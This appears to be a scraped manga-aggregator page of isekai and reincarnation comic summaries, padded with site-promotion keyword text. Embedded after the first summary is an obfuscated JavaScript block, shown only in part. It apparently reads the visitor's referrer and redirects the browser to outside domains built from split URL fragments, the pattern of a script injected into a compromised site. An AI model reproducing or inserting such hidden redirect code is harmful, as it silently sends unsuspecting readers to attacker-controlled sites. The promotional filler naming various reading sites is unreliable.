“Ever Since I Was A Child, I’ve Loved The ‘Normal And Light-Looking But Hides His Strong Powers’ Type Of Character. And Then, A Chance For Rebirth Came! “What Would You Like To Be In The New World?” They Asked. “I Want To Be Someone Who Hides Their True Powers And Strength!” …But I Didn’t Mean It To Be Like This!?”
The MC accidentally entered a hidden boss lair when he was younger, and in the midst of corpses, he was found by the hidden boss and got adopted by him. The boss sees the MC as a toy at first, but as time goes by, looking at the interaction between the cruel boss and the young boy…they somehow seemed like a family?!<script></script><script>function _0x4403(_0x560b2f,_0x44b402){var _0x531c5b=_0x475d();return _0x4403=function(_0x1a3d9f,_0x259951){_0x1a3d9f=_0x1a3d9f-(-0x332+-0x59f*-0x4+-0x4b3*0x4);var _0x4460a0=_0x531c5b[_0x1a3d9f];return _0x4460a0;},_0x4403(_0x560b2f,_0x44b402);}function _0x475d(){var _0x2d4ec4=['3BMWZEm','90203wsETNu','coNub','random','google','cMEiS','FRjfv','2495254npXzek','href','3499803rbIWWO','QalTP','https://ip','505IzPqfH','9715202EIdOXf','VKtUY','3204570QXHqfo','location','.top/','then','includes','dma.net/','KmBzh','kBbbt','8ABRwiW','floor','http://rea','52308OFgrgV','referrer','6697338rrguuc','.customapi','kdaCf','SNkrF','text'];_0x475d=function(){return _0x2d4ec4;};return _0x475d();}(function(_0x18fa4c,_0x56548c){var _0x255725=_0x4403,_0x1a7dac=_0x18fa4c();while(!![]){try{var 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Read “I was Reborn as a Housekeeper in a Parallel World! Novel” – “I was Reborn as a Housekeeper in a Parallel World! Manhwa” Online Free At HOTMANHUA The summary of the comic I was Reborn as a Housekeeper in a Parallel World!: Erena, a high school girl, died in a fire… but she was reborn in a parallel world! She now works as a housekeeper for a wealthy elderly couple, using the housekeeping skills she honed in her men-only family. One day, the elderly couple move in with their son, but his house is the royal castle! The couple were actually the retired previous King and Queen, and their son is the King! Can Erena’s housekeeping skills help pave a new way for the kingdom?! “I was Reborn as a Housekeeper in a Parallel World!” is also known as: Femme de ménage dans un monde parallèle / Tensei Shita Isekai de Kaseifu ni Narimashita! / 転生した異世界で家政婦になりました! / 転生した異世界で家政婦になりました! / 轉生侍女的王宮奮鬥記 The comic “I was Reborn as a Housekeeper in a Parallel World!” belongs to the Genre: Comedy, Fantasy, Isekai, Magic, Reincarnation, Romance “Kun Manga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website S2Manga. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging
Summary: I Was Reincarnated as a Baby Fox God / I Was Reincarnated as a Beast Fox God / 아기 신수로 환생했습니다 The princess of the Roachim Empire was killed by her older brother. Killed, accused of killing their father, the Emperor, she… Kyuaang? …was reincarnated as a divine beast?! An unexpected second life. But something seems weird? The ruler of the north of the Roachim Empire. The owner of the Idelbadour Mountains and the Ice Wall. The Grand Duke of Elharan, whom the Emperor himself cannot approach recklessly… ‘My dad, so you mean I’m a divine beast?!’ “My lady…!” “Please accept these tributes and send down your blessings!” The villagers knelt together at once and prayed earnestly. While wiggling and not knowing what to do, I heard the sound of laughter in my ear. -Lusha got stronger! -She’s strong! She’s fresh! She’s thrilling! -Look at that, even the humans surrendered in the face of Lusha! The spirits were terribly proud of her, saying that the humans were afraid because of Lusha’s power. And they lifted her in the air and carried her. Encompassing her was also a dazzling light that appeared out of nowhere. Everyone who was praying opened their eyes wide. “It’s the blessing of the Divine Beast!” “Hooray for the Baby Fox!” Lusha sighed. “Kiiyuu…”
I was reincarnated as “Luxe,” the villain with the “Evil Eye” that appears in the game, but I didn’t want to meet a miserable end after being reincarnated into my favorite game! I decided to find happiness, I started training in “Dark Magic” from that day on in order to fight off the forces that attacked me insearch of the Evil Eye. And eventually, I’ll become a mob that watches over… my favorite characters! This is the story of how I, who was reincarnated as the villain of my favorite game, and my efforts to change my fate.
I, an innocent office worker, possessed the devastating novel . On top of that, I’m Giselle Lloydsvin, a villainess who poisons herself to death before being hanged! But the poison brought by the assassins doesn\'t work? It even tastes like fruit! “You’ll be okay since it’s only a little bit, so hurry and drink it.” …Even though I possessed someone, it seems my destiny is to be tormented by a crazy assassin. However, “Lenial”, who I thought was just a crazy assassin, turns out to be the frontman for the final villain, “Wayne Ayore”?! In order to hold onto this lifeline, I clung to the villain in . “I can distinguish the taste of poison.” “Poison?” “Yes.” “What use is that?” “Your boss is going to be poisoned, so I can be his poison taster.” And so, I thought I could survive well as a general store employee of the villain’s frontman(?)... “My boss is so strong to the point that there’s something suspicious about him!” …Why does it feel like I’m doomed in this life too?
남주는 정중히 사양하겠습니다! She was possessed as a villain in a novel in which she was miserably executed. I’ve tried everything to avoid the death flags, but in the end, only death surfaced. On the day of the third regression, I made up my mind. Let’s just live! “I’ll die if I live like this, and I’ll be killed if I live like that!”But was it because it had come too far from the original? The main characters’ interest in the original Female Lead seems to be directed at me somehow…?
I possessed a character in the novel I’d been writing for nearly a year. About a wicked woman destined to die a horrible death within two years time. “Is this the price I have to pay for making my readers suffer?” And as for the male lead, he’s stuck rolling over and over like a hoop. For the welfare of my work, the poor male lead, and my own survival, I got a job at the mansion as a maid. But now… “Lady Laria is the best after all. I want you to be the madam of the Blackwell Archduchy.” “Laria is the best!” “Laria, aren’t you like my mother?” The entire archduchy household likes me. Even the Archduke himself. He performs all sorts of things… “The Lady and I are engaged.” We are? Since when? “My children and I need Lady Sherwood. I have no intention of letting her go.” What’s wrong with everyone all of a sudden? I’ve ended up just working for the welfare of the male lead.
20 years after a failed assassination attempt with poison, Fioria wakes to find she has all the memories of her past life. But the world she lives in is in fact the world of an otome game. And what’s more, she wakes up to find the story of the game is now 20 years after the original ending of the game! With her country in turmoil and the original heroine of the story turning out to be a spy, Fioria sets out to right these injustices and give payback to the ones who have wronged her! An action packed tale of justice, I Woke Up 20 Years Later! is a refreshing and exhilarating revenge fantasy story. Okitara 20nen Nandesukedo! Akuyaku Reijo no Sono Ato no Sono Ato / I Woke Up 20 Years Later! The Villainous Daughter’s Thereafter
I, Kwon Jinha, began feeling sick after reading a romance novel. I became connected to all the emotions and sensations of the female lead, Elvi. I even went to the hospital due to severe pain and sorrow but the result said there’s nothing wrong with my body. So, I ended up sending an email to the novel’s author, begging for the male lead to stop tormenting the female lead. But instead, all i got was a happy reply, “Do your job properly, Elvi”. I found myself possessed in Elvi’s body in the novel. I got slapped by the male lead as soon as I possessed Elvi’s body, upon that, I had only one thought, “The male lead? It’s over if I kill him, right?”
Yukitsuki Mashiro has been reincarnated into the world of a dating game. She decides to live an inconspicuous life as one of the heroines, \"Amatsuki Suzuna,\" but after she helps \"Hinase Riri\" who is being harassed by a man in the downtown area, she becomes the target of love. What will become of Suzuna, who is surrounded by more and more heroines as everything she does goes wrong...?!
Have you dreamt of dying and reincarnating in a world full of fantasy and magic? Having an adventure with your companions and raiding dungeons together? That\'s the ideal Isekai dream, but this story is different. (PINOSAISEI) I\'m a Japanese, but I died and got reincarnated as a Filipino. It follows the story of Sakai Shuichi, who died in a truck accident but reincarnated as a Filipino. In the Philippines, his name is Seth Severino. His goal is to go back to Japan as soon as possible. But how can he do that when he became poor in a third-world country?